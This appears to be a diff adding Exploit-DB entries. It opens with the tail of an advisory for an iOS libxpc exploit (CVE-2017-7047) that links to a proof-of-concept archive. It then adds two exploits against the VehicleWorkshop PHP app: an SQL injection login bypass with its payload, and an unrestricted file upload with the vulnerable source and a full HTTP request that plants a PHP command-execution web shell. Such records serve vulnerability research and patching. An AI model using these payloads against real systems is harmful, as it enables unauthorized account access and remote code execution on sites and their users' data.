libgmalloc to see the corruption directly rather than its effects.
################################################################################
triple_fetch - ianbeer
This is an exploit for CVE-2017-7047, a logic error in libxpc which allowed
malicious message senders to send xpc_data objects that were backed by shared memory.
Consumers of xpc messages did not seem to expect that the backing buffers of xpc_data objects
could be modified by the sender whilst being processed by the receiver.
This project exploits CVE-2017-7047 to build a proof-of-concept remote lldb debugserver
stub capable of attaching to and allowing the remote debugging all userspace
processes on iOS 10.0 to 10.3.2.
Please see the README in the nsxpc2pc folder in the attached archive for further discussion and details.
################################################################################
The exploit isn't hugely reliable - the race condition needs quite exact timing and sometimes it just doesn't work or it does but the heap groom fails. You should just hard reboot the device and try again. It may take a couple of attempts but it should work. Once the debugserver is running it should be stable. If you take a look at the xcode stdout/debugger window you can see some more status information.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42407.zip

26
platforms/php/webapps/42403.txt Executable file
View file

@ -0,0 +1,26 @@
[*] Type: Admin or Customer login bypass via SQL injection
[*] Author: Touhid M.Shaikh
[*] Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
[*] Mail: touhidshaikh22[at]gmail[dot]com
[*] More info: https://blog.touhidshaikh.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===================== PoC ================
Admin Login Page : http://127.0.0.1/emplogin.php
Customer Login Page : http://127.0.0.1/login.php
Navigate admin login page or Customer Login Page and submit ' OR 1 --+ for
username and password
and it should give you access to the admin area or Customer Area.
Regards.
Touhid Shaikh

108
platforms/php/webapps/42404.txt Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7
===================
Vulnerable Page:
===================
http://192.168.1.13/sellvehicle.php
====================
Vulnerable Source:
====================
--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);
--------------------------------------------------
-----------------------HTML Form -----------------
<label for="images"></label>
<label for="file"></label>
<input type="file" name="file" id="file" /><input type="hidden"
name="image" />
-----------------------------------------------------------------------
U can upload Shell or File via Regular or customer User Account.
================= POC ======================
We need to login any customer account or create an account (
http://192.168.1.13/registration.php) and login.
After customer panel open Navigate to
http://192.168.1.13/sellvehicle.php
and feed data and upload you unrestricted file.
--------------------------Request---------------------------
POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1
.
.
.
.skip
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
.
.
.
.skip
------------------------------------------------------------------------------
--------------------------Rsponse --------------------------
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 20:38:09 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 2909
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------
====================================================================
Now You Can Access you Shell or File in /upload/backdoor.php
http://192.168.1.13/upload/backdoor.php
Enjoy !
Regards.
Touhid Shaikh